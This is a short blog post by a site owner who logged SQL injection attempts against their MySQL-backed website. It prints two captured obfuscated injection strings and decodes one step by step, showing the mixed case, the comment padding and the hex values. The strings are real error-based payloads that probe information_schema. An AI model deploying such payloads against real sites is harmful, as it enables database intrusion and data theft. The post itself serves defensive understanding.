Founder and Lead Developer of Macrotone Consulting Ltd.
2 minutes reading time (356 words)

SQL Injection Attacks

mysqlWe are experiencing a spate of SQL injection attacks upon our site.

These take the form of appending SQL strings upon the end of valid URL addresses.  A simple Google search reveals that there are many sites where the examples given below have triggered problems. Two typical strings are shown below: 

(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)   

Or

+or+1=(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+1=1   

As one can see the code is specifically targeting MySQL databases.  We presume that they would then, If successful, make further attempts to obtain more information to make a more specific targeted attack.

 

Note also the use of mixed case in the SQL strings used as an attempt to bypass simple selection tests that may/may not be used to detect these types of attack.

Looking at the first example in more detail we can first convert the hexadecimal strings to text and also change case of obvious SQL statements to make easier reading:

Converting the strings gives:   0x4142433134355a5136324457514146504f4959434644 converts to:   ?ABC145ZQ62DWQAFPOIYCFD

And 0x217e21  becomes:  ?!~!?

This gives us the following:

(/**/select+1+/**/from(/**/select+count(*),/**/concat((/**/select(/**/select+/**/unhex(/**/hex(/**/concat(?!~!?, ?ABC145ZQ62DWQAFPOIYCFD,  ?!~!?))))+/**/from+information_schema/**/tables+/**/lImit+0,1),floor(rand(0)*2))x+/**/from+information_schema/**/tables+/**/group/**/by+x)a) 

The next step is to change the ‘+’signs to spaces, since these are used to concatenate the different word together.

(/**/select 1 /**/from(/**/select count(*),/**/concat((/**/select(/**/select /**/unhex(/**/hex(/**/concat(?!~!?, ?ABC145ZQ62DWQAFPOIYCFD,  ?!~!?)))) /**/from information_schema/**/tables /**/lImit 0,1),floor(rand(0)*2))x /**/from information_schema/**/tables /**/group/**/by x)a) 

Take out the ‘/**/’ comment block strings [Why add the comment blocks anyway since they seem to add nothing, other than perhaps to make some form of obscurification!] and we start to see something more sensible:

(select 1 from(select count(*), concat(( select( select unhex(hex( concat(?!~!?, ?ABC145ZQ62DWQAFPOIYCFD,  ?!~!?)))) from information_schema tables lImit 0,1),floor(rand(0)*2))x from information_schema tables group by x)a) 

It is ironic that there appears to be syntax errors in the original source. (Two of which are identical!)

Not quite sure what the significance of the hex strings are currently.

There is something very sad about a situation where certain individuals have nothing better to do with their time than waste it trying to disrupt others efforts to disseminate information and knowledge sharing to those interesting in improving themselves.   Even more so since, if they crafted the SQL themselves they have a certain amount of SQL skills which could be employed to better use.

Reflections on Joomla
CSS: text wrapping in a table cell. word-wrap
 

By accepting you will be accessing a service provided by a third-party external to https://macrotoneconsulting.co.uk/

Go To Top

The Macrotone Consulting Web site would like to use cookies to store information on your computer, to improve our website. Cookies used for the essential operation of the site have already been set. To find out more about the cookies we use and how to delete them, see our Privacy Policy.

I accept cookies from this site.